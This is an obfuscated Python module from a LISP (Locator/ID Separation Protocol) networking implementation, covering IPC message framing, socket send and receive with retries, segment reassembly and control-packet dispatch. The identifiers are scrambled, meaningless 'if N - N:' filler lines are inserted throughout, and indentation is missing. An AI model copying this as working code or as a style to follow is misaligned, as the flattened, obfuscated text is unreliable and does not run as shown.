if 65 - 65: I1IiiI . Oo0Ooo + i1IIi - Ii1I * i1IIi
if 64 - 64: I1IiiI / OoO0O00 * I1IiiI * II111iiii . Ii1I
def lisp_is_running ( node ) :
return ( True if ( os . path . exists ( node ) ) else False )
if 98 - 98: I1Ii111 + o0oOOo0O0Ooo
if 73 - 73: I1ii11iIi11i / I1Ii111 + i11iIiiIii + OoO0O00 . ooOoO0o
if 54 - 54: I1ii11iIi11i + IiII - oO0o + Oo0Ooo / IiII % Oo0Ooo
if 2 - 2: OOooOOo / I11i * I11i + I11i / O0 - OOooOOo
if 29 - 29: OoOoOO00 + i11iIiiIii % OoO0O00 - OoooooooOO
if 68 - 68: iII111i / OOooOOo
if 28 - 28: II111iiii
if 49 - 49: I1ii11iIi11i
if 33 - 33: iIii1I11I1II1
if 72 - 72: I1ii11iIi11i * i11iIiiIii
if 12 - 12: O0 - iIii1I11I1II1 % Oo0Ooo / O0 - IiII
def lisp_packet_ipc ( packet , source , sport ) :
i111ii1II11ii = "packet@{}@{}@{}@" . format ( str ( len ( packet ) ) , source , str ( sport ) )
return ( i111ii1II11ii . encode ( ) + packet )
if 55 - 55: OOooOOo . Oo0Ooo * OoOoOO00 / OoooooooOO * i11iIiiIii + oO0o
if 45 - 45: Ii1I
if 8 - 8: oO0o + OOooOOo
if 37 - 37: IiII - OoOoOO00 + oO0o - Oo0Ooo + IiII
if 33 - 33: Oo0Ooo % oO0o - I1IiiI + Oo0Ooo
if 90 - 90: I1ii11iIi11i * I1Ii111 - iIii1I11I1II1 % IiII * I1Ii111 . I1Ii111
if 90 - 90: o0oOOo0O0Ooo - O0 % O0 - oO0o . OoooooooOO
if 30 - 30: I11i + O0 / Ii1I / OoOoOO00 - oO0o + II111iiii
if 21 - 21: iIii1I11I1II1 % OoooooooOO * OOooOOo % i1IIi
if 73 - 73: OoooooooOO
def lisp_control_packet_ipc ( packet , source , dest , dport ) :
i111ii1II11ii = "control-packet@{}@{}@" . format ( dest , str ( dport ) )
return ( i111ii1II11ii . encode ( ) + packet )
if 100 - 100: I11i / i1IIi / i1IIi % Ii1I - II111iiii . OoooooooOO
if 72 - 72: Oo0Ooo * OoooooooOO % I1IiiI + I11i - II111iiii
if 82 - 82: iIii1I11I1II1 / i1IIi * I1IiiI . i11iIiiIii
if 56 - 56: Ii1I * I1IiiI / ooOoO0o * II111iiii
if 51 - 51: i1IIi . oO0o % OOooOOo
if 90 - 90: OoooooooOO + iII111i / iIii1I11I1II1
if 12 - 12: OoooooooOO
if 9 - 9: O0 / O0 / I1IiiI - oO0o . ooOoO0o
if 6 - 6: O0 - OoO0O00 + OoooooooOO % iIii1I11I1II1
def lisp_data_packet_ipc ( packet , source ) :
i111ii1II11ii = "data-packet@{}@{}@@" . format ( str ( len ( packet ) ) , source )
return ( i111ii1II11ii . encode ( ) + packet )
if 58 - 58: i11iIiiIii * OOooOOo . Oo0Ooo / iII111i - i1IIi
if 45 - 45: Ii1I
if 89 - 89: ooOoO0o + I11i * O0 % OoOoOO00
if 2 - 2: I1Ii111 % iIii1I11I1II1 . Ii1I - II111iiii
if 33 - 33: I11i . i11iIiiIii % i1IIi * II111iiii * i11iIiiIii + OoOoOO00
if 26 - 26: I1IiiI % OoOoOO00 % I11i + Oo0Ooo
if 86 - 86: iII111i / i1IIi % Oo0Ooo
if 84 - 84: o0oOOo0O0Ooo * OOooOOo . I11i * Ii1I
if 32 - 32: ooOoO0o % ooOoO0o * I1ii11iIi11i % Ii1I + Oo0Ooo . OoOoOO00
if 2 - 2: I1Ii111 / ooOoO0o * oO0o + IiII
if 14 - 14: OoOoOO00 / iIii1I11I1II1 . o0oOOo0O0Ooo % i11iIiiIii . OoOoOO00
def lisp_command_ipc ( ipc , source ) :
OO0Oo00OO0oo = "command@{}@{}@@" . format ( len ( ipc ) , source ) + ipc
return ( OO0Oo00OO0oo . encode ( ) )
if 92 - 92: OoO0O00 . i1IIi
if 22 - 22: Ii1I . I1IiiI
if 54 - 54: OOooOOo / I1ii11iIi11i % oO0o
if 66 - 66: I11i + iII111i
if 50 - 50: IiII
if 33 - 33: OOooOOo % I1IiiI - I1IiiI / IiII
if 22 - 22: ooOoO0o * ooOoO0o % o0oOOo0O0Ooo * Ii1I . OoO0O00
if 55 - 55: OoOoOO00 - I1ii11iIi11i + iIii1I11I1II1 - i11iIiiIii / i1IIi / II111iiii
if 37 - 37: Ii1I + o0oOOo0O0Ooo
if 74 - 74: Oo0Ooo / O0 + i1IIi . I1IiiI + OoO0O00 / Oo0Ooo
if 13 - 13: o0oOOo0O0Ooo / Ii1I . II111iiii
def lisp_api_ipc ( source , data ) :
OO0Oo00OO0oo = "api@" + str ( len ( data ) ) + "@" + source + "@@" + data
return ( OO0Oo00OO0oo . encode ( ) )
if 8 - 8: I11i - I11i % IiII
if 8 - 8: I1IiiI . IiII * O0 * o0oOOo0O0Ooo
if 17 - 17: I1IiiI . oO0o + Oo0Ooo + I11i / o0oOOo0O0Ooo
if 25 - 25: iII111i / iII111i % OoOoOO00 / ooOoO0o
if 81 - 81: OOooOOo * oO0o
if 32 - 32: Oo0Ooo * OoO0O00 + ooOoO0o . O0 * oO0o * iIii1I11I1II1
if 50 - 50: i1IIi
if 53 - 53: II111iiii + O0 . ooOoO0o * IiII + i1IIi
if 80 - 80: Ii1I + O0
if 59 - 59: i11iIiiIii - OoooooooOO % I11i . OoO0O00 - Oo0Ooo * o0oOOo0O0Ooo
if 7 - 7: II111iiii % Ii1I * i11iIiiIii
if 28 - 28: II111iiii / ooOoO0o * i11iIiiIii % OOooOOo
def lisp_ipc ( packet , send_socket , node ) :
if 18 - 18: I11i - IiII - iIii1I11I1II1
if 82 - 82: II111iiii + OoO0O00 % iIii1I11I1II1 / O0
if 75 - 75: OOooOOo * OoO0O00 + OoooooooOO + i11iIiiIii . OoO0O00
if 94 - 94: I11i * ooOoO0o . I1IiiI / Ii1I - I1IiiI % OoooooooOO
if ( lisp_is_running ( node ) == False ) :
lprint ( "Suppress sending IPC to {}" . format ( node ) )
return
if 32 - 32: OoO0O00
if 22 - 22: II111iiii . I11i
O0oooO0o0o = 1500 if ( packet . find ( b"control-packet" ) == - 1 ) else 9000
if 66 - 66: I11i * IiII / IiII
IiI1ii1Ii = 0
iI = len ( packet )
Oo00o = 0
Oo00000oooOO = .001
while ( iI > 0 ) :
i1ii1Ii = min ( iI , O0oooO0o0o )
iiiIi11111 = packet [ IiI1ii1Ii : i1ii1Ii + IiI1ii1Ii ]
if 96 - 96: I1ii11iIi11i - I11i . I11i . ooOoO0o . iIii1I11I1II1
try :
if ( type ( iiiIi11111 ) == str ) : iiiIi11111 = iiiIi11111 . encode ( )
send_socket . sendto ( iiiIi11111 , node )
lprint ( "Send IPC {}-out-of-{} byte to {} succeeded" . format ( len ( iiiIi11111 ) , len ( packet ) , node ) )
if 31 - 31: I11i / iIii1I11I1II1 . I1ii11iIi11i
Oo00o = 0
Oo00000oooOO = .001
if 51 - 51: I1ii11iIi11i
except socket . error as I1i :
if ( Oo00o == 12 ) :
lprint ( "Giving up on {}, consider it down" . format ( node ) )
break
if 37 - 37: I1IiiI % I1Ii111
if 22 - 22: o0oOOo0O0Ooo % OOooOOo - I11i + ooOoO0o / OOooOOo
lprint ( "Send IPC {}-out-of-{} byte to {} failed: {}" . format ( len ( iiiIi11111 ) , len ( packet ) , node , I1i ) )
if 98 - 98: I11i * O0 + IiII - oO0o
if 35 - 35: OoooooooOO * Ii1I
Oo00o += 1
time . sleep ( Oo00000oooOO )
if 73 - 73: ooOoO0o . OoO0O00 % I1ii11iIi11i - oO0o
lprint ( "Retrying after {} ms ..." . format ( Oo00000oooOO * 1000 ) )
Oo00000oooOO *= 2
continue
if 67 - 67: o0oOOo0O0Ooo . I11i + i1IIi
if 100 - 100: Oo0Ooo - I1IiiI . OOooOOo % iIii1I11I1II1 . I11i
IiI1ii1Ii += i1ii1Ii
iI -= i1ii1Ii
if 83 - 83: OoOoOO00 * iII111i
return
if 75 - 75: i11iIiiIii . o0oOOo0O0Ooo / oO0o . OoO0O00 % Ii1I % Ii1I
if 94 - 94: iII111i . Ii1I
if 71 - 71: o0oOOo0O0Ooo * II111iiii / OOooOOo . OoO0O00
if 73 - 73: I1Ii111 * OoO0O00 / OoOoOO00 . II111iiii
if 87 - 87: OoO0O00 + Oo0Ooo + O0 % OoooooooOO - iIii1I11I1II1
if 100 - 100: Oo0Ooo + IiII
if 81 - 81: iIii1I11I1II1 + iIii1I11I1II1
if 19 - 19: ooOoO0o + i1IIi / Oo0Ooo * II111iiii * I1Ii111 / ooOoO0o
def lisp_format_packet ( packet ) :
packet = binascii . hexlify ( packet )
IiI1ii1Ii = 0
iiiiIIiiII1Iii1 = b""
iI = len ( packet ) * 2
while ( IiI1ii1Ii < iI ) :
iiiiIIiiII1Iii1 += packet [ IiI1ii1Ii : IiI1ii1Ii + 8 ] + b" "
IiI1ii1Ii += 8
iI -= 4
if 23 - 23: I1Ii111
return ( iiiiIIiiII1Iii1 . decode ( ) )
if 76 - 76: Ii1I + Ii1I / i1IIi % o0oOOo0O0Ooo . iIii1I11I1II1 . OoOoOO00
if 75 - 75: I11i . Ii1I / I1ii11iIi11i
if 99 - 99: Ii1I
if 85 - 85: I1Ii111 + I1Ii111 + OoOoOO00 / ooOoO0o / o0oOOo0O0Ooo . Oo0Ooo
if 41 - 41: i1IIi % Ii1I . i1IIi * OoooooooOO % Ii1I
if 21 - 21: iII111i
if 72 - 72: I11i % o0oOOo0O0Ooo . iIii1I11I1II1 - I1Ii111 / i11iIiiIii
def lisp_send ( lisp_sockets , dest , port , packet ) :
oo00 = lisp_sockets [ 0 ] if dest . is_ipv4 ( ) else lisp_sockets [ 1 ]
if 64 - 64: i1IIi % Oo0Ooo / O0 % Oo0Ooo
if 49 - 49: II111iiii * iIii1I11I1II1 / I11i - oO0o
if 76 - 76: I1Ii111 . Oo0Ooo - ooOoO0o . II111iiii - iII111i
if 36 - 36: iIii1I11I1II1 % Oo0Ooo
if 67 - 67: oO0o / II111iiii . I11i / oO0o
if 46 - 46: oO0o * Oo0Ooo - I11i / iIii1I11I1II1
if 100 - 100: i11iIiiIii % oO0o
if 62 - 62: OOooOOo * i1IIi - OOooOOo / i11iIiiIii
if 17 - 17: I1ii11iIi11i + ooOoO0o % Ii1I % OOooOOo
if 73 - 73: i11iIiiIii
if 44 - 44: o0oOOo0O0Ooo % Ii1I - OoOoOO00 + OoOoOO00 * IiII + iII111i
if 58 - 58: I1ii11iIi11i / oO0o + i11iIiiIii * o0oOOo0O0Ooo
Ii1IiIIIi = dest . print_address_no_iid ( )
if ( Ii1IiIIIi . find ( "::ffff:" ) != - 1 and Ii1IiIIIi . count ( "." ) == 3 ) :
if ( lisp_i_am_rtr ) : oo00 = lisp_sockets [ 0 ]
if ( oo00 == None ) :
oo00 = lisp_sockets [ 0 ]
Ii1IiIIIi = Ii1IiIIIi . split ( "::ffff:" ) [ - 1 ]
if 19 - 19: OoOoOO00
if 17 - 17: Oo0Ooo
if 76 - 76: II111iiii % I1ii11iIi11i
lprint ( "{} {} bytes {} {}, packet: {}" . format ( bold ( "Send" , False ) ,
len ( packet ) , bold ( "to " + Ii1IiIIIi , False ) , port ,
lisp_format_packet ( packet ) ) )
if 99 - 99: oO0o - I1Ii111
if 29 - 29: I1IiiI - I11i
if 42 - 42: Oo0Ooo - O0 . OoOoOO00
if 4 - 4: IiII
iIi1i1i1II1 = ( LISP_RLOC_PROBE_TTL == 128 )
if ( iIi1i1i1II1 ) :
ooOoo0OO0O = struct . unpack ( "B" , packet [ 0 : 1 ] ) [ 0 ]
iIi1i1i1II1 = ( ooOoo0OO0O in [ 0x12 , 0x28 ] )
if ( iIi1i1i1II1 ) : lisp_set_ttl ( oo00 , LISP_RLOC_PROBE_TTL )
if 4 - 4: o0oOOo0O0Ooo
if 44 - 44: I11i % IiII / I1IiiI . OoO0O00 * Ii1I
try : oo00 . sendto ( packet , ( Ii1IiIIIi , port ) )
except socket . error as I1i :
lprint ( "socket.sendto() failed: {}" . format ( I1i ) )
if 89 - 89: OoOoOO00 / Oo0Ooo + O0 * ooOoO0o
if 80 - 80: i11iIiiIii - O0 / I1Ii111 + OOooOOo % Oo0Ooo
if 95 - 95: II111iiii
if 76 - 76: OoO0O00 % iII111i * OoOoOO00 / ooOoO0o / i1IIi
if 45 - 45: Ii1I . I11i * I1Ii111 . i11iIiiIii
if ( iIi1i1i1II1 ) : lisp_set_ttl ( oo00 , 64 )
return
if 34 - 34: O0 * o0oOOo0O0Ooo / IiII
if 75 - 75: I1Ii111 - i1IIi - OoO0O00
if 25 - 25: iII111i . o0oOOo0O0Ooo
if 62 - 62: I11i + i1IIi . I1ii11iIi11i - I1ii11iIi11i
if 68 - 68: ooOoO0o % OoooooooOO
if 94 - 94: Oo0Ooo * o0oOOo0O0Ooo
if 60 - 60: iII111i . OOooOOo
if 39 - 39: O0 - i11iIiiIii - I1IiiI / Oo0Ooo - i11iIiiIii
def lisp_receive_segments ( lisp_socket , packet , source , total_length ) :
if 30 - 30: OoO0O00 / OoOoOO00 + I1ii11iIi11i % IiII - OoO0O00
if 19 - 19: I1IiiI
if 99 - 99: OOooOOo - OOooOOo
if 98 - 98: o0oOOo0O0Ooo + O0 * oO0o - i11iIiiIii
if 83 - 83: o0oOOo0O0Ooo
i1ii1Ii = total_length - len ( packet )
if ( i1ii1Ii == 0 ) : return ( [ True , packet ] )
if 23 - 23: o0oOOo0O0Ooo . I11i
lprint ( "Received {}-out-of-{} byte segment from {}" . format ( len ( packet ) ,
total_length , source ) )
if 67 - 67: iII111i
if 52 - 52: IiII . OoooooooOO
if 34 - 34: o0oOOo0O0Ooo / IiII . OoooooooOO . Oo0Ooo / ooOoO0o + O0
if 38 - 38: I11i
if 66 - 66: II111iiii
iI = i1ii1Ii
while ( iI > 0 ) :
try : iiiIi11111 = lisp_socket . recvfrom ( 9000 )
except : return ( [ False , None ] )
if 57 - 57: OoO0O00 / Oo0Ooo % I1IiiI * I1ii11iIi11i
iiiIi11111 = iiiIi11111 [ 0 ]
if 68 - 68: iII111i - o0oOOo0O0Ooo - OoO0O00 . O0 - i11iIiiIii
if 2 - 2: I1ii11iIi11i * i1IIi
if 17 - 17: I1ii11iIi11i * Ii1I % Oo0Ooo * I1Ii111 + OoO0O00 . OoooooooOO
if 60 - 60: Ii1I . II111iiii
if 36 - 36: IiII . iII111i * O0 . i1IIi * O0 * I1Ii111
IiIIIi = iiiIi11111 . decode ( )
if ( IiIIIi . find ( "packet@" ) == 0 ) :
IiIIIi = IiIIIi . split ( "@" )
lprint ( "Received new message ({}-out-of-{}) while receiving " + "fragments, old message discarded" , len ( iiiIi11111 ) ,
# ooOoO0o * Ii1I * I11i % I1Ii111 - ooOoO0o
IiIIIi [ 1 ] if len ( IiIIIi ) > 2 else "?" )
return ( [ False , iiiIi11111 ] )
if 60 - 60: OoO0O00 * O0 + I1ii11iIi11i . oO0o . o0oOOo0O0Ooo
if 90 - 90: OOooOOo . i1IIi - iII111i % OoooooooOO * OoooooooOO
iI -= len ( iiiIi11111 )
packet += iiiIi11111
if 36 - 36: OoOoOO00 - iIii1I11I1II1 % OoooooooOO + II111iiii . oO0o - I1ii11iIi11i
lprint ( "Received {}-out-of-{} byte segment from {}" . format ( len ( iiiIi11111 ) , total_length , source ) )
if 69 - 69: iII111i * IiII * oO0o % OoO0O00 - o0oOOo0O0Ooo
if 97 - 97: O0 + i11iIiiIii . i1IIi
return ( [ True , packet ] )
if 43 - 43: II111iiii + OOooOOo . i11iIiiIii - II111iiii
if 80 - 80: o0oOOo0O0Ooo . oO0o . I1Ii111
if 26 - 26: i1IIi - I1IiiI + IiII / OoO0O00 . I1ii11iIi11i
if 82 - 82: I1Ii111 % iII111i . OoOoOO00 % OoO0O00 + I1ii11iIi11i
if 69 - 69: I1IiiI * OoOoOO00 - ooOoO0o . O0
if 15 - 15: oO0o . IiII + I1Ii111 - OoooooooOO
if 85 - 85: II111iiii - Oo0Ooo + oO0o . i11iIiiIii + Oo0Ooo
if 86 - 86: ooOoO0o . OoO0O00
if 47 - 47: IiII % I1IiiI
def lisp_bit_stuff ( payload ) :
lprint ( "Bit-stuffing, found {} segments" . format ( len ( payload ) ) )
OO0Oo00OO0oo = b""
for iiiIi11111 in payload : OO0Oo00OO0oo += iiiIi11111 + b"\x40"
return ( OO0Oo00OO0oo [ : - 1 ] )
if 91 - 91: Ii1I
if 69 - 69: iII111i
if 96 - 96: Ii1I
if 39 - 39: OoO0O00 - I1IiiI % II111iiii - IiII * I1ii11iIi11i
if 64 - 64: OOooOOo + Oo0Ooo . OoOoOO00 . OOooOOo + i11iIiiIii
if 7 - 7: ooOoO0o * I11i / iIii1I11I1II1
if 15 - 15: OoooooooOO / iII111i
if 40 - 40: o0oOOo0O0Ooo
if 75 - 75: oO0o - OoOoOO00 * ooOoO0o . O0
if 78 - 78: Oo0Ooo
if 74 - 74: O0 / I11i
if 52 - 52: I1IiiI + oO0o * II111iiii
if 15 - 15: I11i
if 72 - 72: O0
if 15 - 15: II111iiii / I11i % II111iiii % Ii1I % i11iIiiIii / I1Ii111
if 93 - 93: OOooOOo / OoooooooOO % iII111i
if 47 - 47: o0oOOo0O0Ooo - I1IiiI % O0 % I1Ii111 . O0 . OoOoOO00
if 95 - 95: o0oOOo0O0Ooo * OOooOOo - iII111i * OoooooooOO - ooOoO0o / I1IiiI
if 47 - 47: OoO0O00 % I1IiiI / OoOoOO00 - I1Ii111 / I1IiiI
if 13 - 13: o0oOOo0O0Ooo % ooOoO0o
def lisp_receive ( lisp_socket , internal ) :
while ( True ) :
if 15 - 15: iII111i * I1IiiI . iIii1I11I1II1 % I1IiiI / O0
if 47 - 47: OoooooooOO - i11iIiiIii . I1IiiI / i1IIi
if 74 - 74: OoooooooOO * ooOoO0o
if 45 - 45: Oo0Ooo + iIii1I11I1II1 . o0oOOo0O0Ooo
try : iIiIiIi111 = lisp_socket . recvfrom ( 9000 )
except : return ( [ "" , "" , "" , "" ] )
if 40 - 40: Oo0Ooo / iIii1I11I1II1 % iIii1I11I1II1
if 66 - 66: iII111i
if 72 - 72: ooOoO0o / oO0o / iII111i . I1Ii111 . I1ii11iIi11i + IiII
if 39 - 39: I1IiiI % I1Ii111
if 22 - 22: OoOoOO00 - OOooOOo % i1IIi + i1IIi
if 28 - 28: oO0o + OoOoOO00 * Ii1I . I11i
if ( internal == False ) :
OO0Oo00OO0oo = iIiIiIi111 [ 0 ]
OO = lisp_convert_6to4 ( iIiIiIi111 [ 1 ] [ 0 ] )
O00oo0o0o0oo = iIiIiIi111 [ 1 ] [ 1 ]
if 80 - 80: I1ii11iIi11i / OoOoOO00
if ( O00oo0o0o0oo == LISP_DATA_PORT ) :
OOOoOO = lisp_data_plane_logging
o000oO = lisp_format_packet ( OO0Oo00OO0oo [ 0 : 60 ] ) + " ..."
else :
OOOoOO = True
o000oO = lisp_format_packet ( OO0Oo00OO0oo )
if 60 - 60: OoOoOO00 / i1IIi * iIii1I11I1II1
if 91 - 91: I1Ii111 . OoooooooOO / IiII / I1IiiI
if ( OOOoOO ) :
lprint ( "{} {} bytes {} {}, packet: {}" . format ( bold ( "Receive" ,
False ) , len ( OO0Oo00OO0oo ) , bold ( "from " + OO , False ) , O00oo0o0o0oo ,
o000oO ) )
if 56 - 56: II111iiii + iIii1I11I1II1 / I1Ii111 / I1Ii111 % Oo0Ooo / OoOoOO00
return ( [ "packet" , OO , O00oo0o0o0oo , OO0Oo00OO0oo ] )
if 46 - 46: i11iIiiIii + OoO0O00 . ooOoO0o + OoO0O00 % i11iIiiIii
if 97 - 97: OoooooooOO % IiII * iIii1I11I1II1
if 97 - 97: iIii1I11I1II1 - I1Ii111 - o0oOOo0O0Ooo * o0oOOo0O0Ooo * OoOoOO00
if 80 - 80: II111iiii . I1ii11iIi11i % i11iIiiIii / Ii1I / oO0o
if 100 - 100: Ii1I . OoO0O00 * ooOoO0o
if 4 - 4: i1IIi + OoooooooOO
II1i = False
oO00Oo0OO = iIiIiIi111 [ 0 ]
if ( type ( oO00Oo0OO ) == str ) : oO00Oo0OO = oO00Oo0OO . encode ( )
OOo = False
if 87 - 87: ooOoO0o . i11iIiiIii / Oo0Ooo
while ( II1i == False ) :
oO00Oo0OO = oO00Oo0OO . split ( b"@" )
if 24 - 24: Ii1I . I1ii11iIi11i . i1IIi % Oo0Ooo
if ( len ( oO00Oo0OO ) < 4 ) :
lprint ( "Possible fragment (length {}), from old message, " + "discarding" , len ( oO00Oo0OO [ 0 ] ) )
if 63 - 63: OoO0O00 . I1IiiI + ooOoO0o + I1ii11iIi11i
OOo = True
break
if 63 - 63: OoooooooOO * OoOoOO00 - Ii1I
if 93 - 93: OoooooooOO * OOooOOo
iIIIIi1 = oO00Oo0OO [ 0 ] . decode ( )
try :
iiiIIi1I1I1 = int ( oO00Oo0OO [ 1 ] )
except :
IiIi11i1iiii = bold ( "Internal packet reassembly error" , False )
lprint ( "{}: {}" . format ( IiIi11i1iiii , iIiIiIi111 ) )
OOo = True
break
if 31 - 31: OoooooooOO / ooOoO0o / OoooooooOO + ooOoO0o . O0 - IiII
OO = oO00Oo0OO [ 2 ] . decode ( )
O00oo0o0o0oo = oO00Oo0OO [ 3 ] . decode ( )
if 53 - 53: Oo0Ooo % iII111i % iII111i
if 71 - 71: iII111i
if 99 - 99: O0 - OoOoOO00 * I1Ii111 - Oo0Ooo
if 62 - 62: i1IIi + ooOoO0o + Oo0Ooo - i11iIiiIii
if 19 - 19: I1IiiI / OOooOOo
if 6 - 6: I1ii11iIi11i + IiII * oO0o * OoOoOO00
if 67 - 67: I1Ii111 + OoooooooOO + OoOoOO00 % iIii1I11I1II1 . I1IiiI
if 68 - 68: ooOoO0o
if ( len ( oO00Oo0OO ) > 5 ) :
OO0Oo00OO0oo = lisp_bit_stuff ( oO00Oo0OO [ 4 : : ] )
else :
OO0Oo00OO0oo = oO00Oo0OO [ 4 ]
if 68 - 68: I11i % IiII
if 1 - 1: I1IiiI + OOooOOo - OOooOOo * O0 + o0oOOo0O0Ooo * OOooOOo
if 48 - 48: ooOoO0o - iII111i + I1ii11iIi11i * I1Ii111 % ooOoO0o * OoO0O00
if 28 - 28: i1IIi / iII111i + OOooOOo
if 89 - 89: Oo0Ooo + II111iiii * OoO0O00 + Oo0Ooo % II111iiii
if 59 - 59: O0 + Oo0Ooo
II1i , OO0Oo00OO0oo = lisp_receive_segments ( lisp_socket , OO0Oo00OO0oo ,
OO , iiiIIi1I1I1 )
if ( OO0Oo00OO0oo == None ) : return ( [ "" , "" , "" , "" ] )
if 63 - 63: OoO0O00 / I1IiiI / oO0o . Ii1I / i1IIi
if 50 - 50: I11i . I11i % I1IiiI - i1IIi
if 63 - 63: OoO0O00 . iII111i
if 28 - 28: ooOoO0o . Oo0Ooo - OoooooooOO - I1Ii111 - OoooooooOO - oO0o
if 25 - 25: I11i / I1Ii111 . i11iIiiIii % i1IIi
if ( II1i == False ) :
oO00Oo0OO = OO0Oo00OO0oo
continue
if 21 - 21: O0 * IiII . iII111i / iII111i % i11iIiiIii / I11i
if 15 - 15: o0oOOo0O0Ooo / OoO0O00 - i1IIi
if ( O00oo0o0o0oo == "" ) : O00oo0o0o0oo = "no-port"
if ( iIIIIi1 == "command" and lisp_i_am_core == False ) :
OOOooo0OooOoO = OO0Oo00OO0oo . find ( b" {" )
iI111 = OO0Oo00OO0oo if OOOooo0OooOoO == - 1 else OO0Oo00OO0oo [ : OOOooo0OooOoO ]
iI111 = ": '" + iI111 . decode ( ) + "'"
else :
iI111 = ""
if 40 - 40: i1IIi . iIii1I11I1II1 * OoOoOO00
if 83 - 83: iIii1I11I1II1 + Ii1I - Ii1I % II111iiii
lprint ( "{} {} bytes {} {}, {}{}" . format ( bold ( "Receive" , False ) ,
len ( OO0Oo00OO0oo ) , bold ( "from " + OO , False ) , O00oo0o0o0oo , iIIIIi1 ,
iI111 if ( iIIIIi1 in [ "command" , "api" ] ) else ": ... " if ( iIIIIi1 == "data-packet" ) else ": " + lisp_format_packet ( OO0Oo00OO0oo ) ) )
if 82 - 82: O0
if 18 - 18: iII111i . IiII . I1IiiI
if 40 - 40: IiII / oO0o + OoooooooOO / iII111i / II111iiii + i1IIi
if 33 - 33: I11i + I1ii11iIi11i + i11iIiiIii * I1IiiI % oO0o % OoooooooOO
if 4 - 4: OoO0O00 . I1IiiI - O0 % iII111i . OOooOOo
if ( OOo ) : continue
return ( [ iIIIIi1 , OO , O00oo0o0o0oo , OO0Oo00OO0oo ] )
if 69 - 69: OoooooooOO
if 19 - 19: O0 + iIii1I11I1II1 / OoOoOO00 / oO0o + II111iiii - OOooOOo
if 70 - 70: i1IIi * o0oOOo0O0Ooo + I1Ii111 . ooOoO0o - O0 + i11iIiiIii
if 81 - 81: iIii1I11I1II1 - OoO0O00 . i11iIiiIii
if 4 - 4: o0oOOo0O0Ooo / OoO0O00 - I11i
if 52 - 52: II111iiii . iII111i
if 36 - 36: I1IiiI * II111iiii
if 68 - 68: oO0o * o0oOOo0O0Ooo + OoooooooOO - I1ii11iIi11i * i1IIi % OOooOOo
def lisp_parse_packet ( lisp_sockets , packet , source , udp_sport , ttl = - 1 ) :
I1I1I111II11Ii1 = False
oOo0OOOo0 = time . time ( )
if 16 - 16: IiII - I1ii11iIi11i - Oo0Ooo - ooOoO0o / OoooooooOO % i1IIi
i111ii1II11ii = lisp_control_header ( )
if ( i111ii1II11ii . decode ( packet ) == None ) :
lprint ( "Could not decode control header" )
return ( I1I1I111II11Ii1 )
if 85 - 85: i11iIiiIii / OoO0O00 / oO0o
if 12 - 12: iII111i % OOooOOo % i1IIi
if 17 - 17: IiII
if 63 - 63: ooOoO0o . i11iIiiIii / iIii1I11I1II1
if 8 - 8: i11iIiiIii . IiII * iIii1I11I1II1 * I1IiiI * Ii1I * i11iIiiIii
III1iII1I1II = source
if ( source . find ( "lisp" ) == - 1 ) :
I1iiIi111I = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
I1iiIi111I . string_to_afi ( source )
I1iiIi111I . store_address ( source )
source = I1iiIi111I
if 75 - 75: oO0o % I1IiiI
if 53 - 53: IiII
if ( i111ii1II11ii . type == LISP_MAP_REQUEST ) :
lisp_process_map_request ( lisp_sockets , packet , None , 0 , source ,
udp_sport , False , ttl , oOo0OOOo0 )
if 54 - 54: OoooooooOO * iIii1I11I1II1 - I1Ii111
elif ( i111ii1II11ii . type == LISP_MAP_REPLY ) :
lisp_process_map_reply ( lisp_sockets , packet , source , ttl , oOo0OOOo0 )
if 86 - 86: O0 * IiII + OoOoOO00 + OoO0O00
elif ( i111ii1II11ii . type == LISP_MAP_REGISTER ) :
lisp_process_map_register ( lisp_sockets , packet , source , udp_sport )
if 53 - 53: I1IiiI % i11iIiiIii + o0oOOo0O0Ooo . I1ii11iIi11i
elif ( i111ii1II11ii . type == LISP_MAP_NOTIFY ) :
if ( III1iII1I1II == "lisp-etr" ) :
lisp_process_multicast_map_notify ( packet , source )
elif ( lisp_is_running ( "lisp-rtr" ) ) :
lisp_process_multicast_map_notify ( packet , source )
elif ( lisp_is_running ( "lisp-itr" ) ) :
lisp_process_unicast_map_notify ( lisp_sockets , packet , source )
if 73 - 73: iII111i - o0oOOo0O0Ooo / OOooOOo + iII111i + o0oOOo0O0Ooo % II111iiii
if 74 - 74: I11i * iIii1I11I1II1 - OoO0O00 / i1IIi / OoO0O00 / IiII
elif ( i111ii1II11ii . type == LISP_MAP_NOTIFY_ACK ) :
lisp_process_map_notify_ack ( packet , source )
if 60 - 60: oO0o % I1Ii111 % Oo0Ooo
elif ( i111ii1II11ii . type == LISP_MAP_REFERRAL ) :
lisp_process_map_referral ( lisp_sockets , packet , source )
if 34 - 34: o0oOOo0O0Ooo * OOooOOo % Ii1I + I1IiiI
elif ( i111ii1II11ii . type == LISP_NAT_INFO and i111ii1II11ii . is_info_reply ( ) ) :
ooooO00o0 , o00oOo0O0OO , I1I1I111II11Ii1 = lisp_process_info_reply ( source , packet , True )
if 77 - 77: OoOoOO00 + IiII + Oo0Ooo
elif ( i111ii1II11ii . type == LISP_NAT_INFO and i111ii1II11ii . is_info_reply ( ) == False ) :
Oo0o = source . print_address_no_iid ( )
lisp_process_info_request ( lisp_sockets , packet , Oo0o , udp_sport ,
None )
if 88 - 88: i1IIi
elif ( i111ii1II11ii . type == LISP_ECM ) :
lisp_process_ecm ( lisp_sockets , packet , source , udp_sport )
if 45 - 45: iII111i % I1ii11iIi11i / i11iIiiIii - II111iiii . Oo0Ooo / ooOoO0o
else :
lprint ( "Invalid LISP control packet type {}" . format ( i111ii1II11ii . type ) )
if 55 - 55: OoO0O00 % IiII
return ( I1I1I111II11Ii1 )
if 93 - 93: OoO0O00 . I1ii11iIi11i / OOooOOo % OoooooooOO + i1IIi + I1Ii111
if 94 - 94: II111iiii + i11iIiiIii % Ii1I / ooOoO0o * OoOoOO00
if 68 - 68: O0 / Oo0Ooo / iIii1I11I1II1
if 63 - 63: I1Ii111 + iII111i
if 6 - 6: I1ii11iIi11i + Ii1I
if 36 - 36: iII111i + iII111i * OoO0O00 * I1ii11iIi11i
if 97 - 97: ooOoO0o + OOooOOo
def lisp_process_rloc_probe_request ( lisp_sockets , map_request , source , port ,
ttl , timestamp ) :
if 70 - 70: o0oOOo0O0Ooo + Ii1I - i11iIiiIii + I11i * o0oOOo0O0Ooo . Ii1I
o00oo = bold ( "RLOC-probe" , False )
if 6 - 6: Oo0Ooo + I1IiiI
if ( lisp_i_am_etr ) :
lprint ( "Received {} Map-Request, send RLOC-probe Map-Reply" . format ( o00oo ) )
lisp_etr_process_map_request ( lisp_sockets , map_request , source , port ,
ttl , timestamp )
return
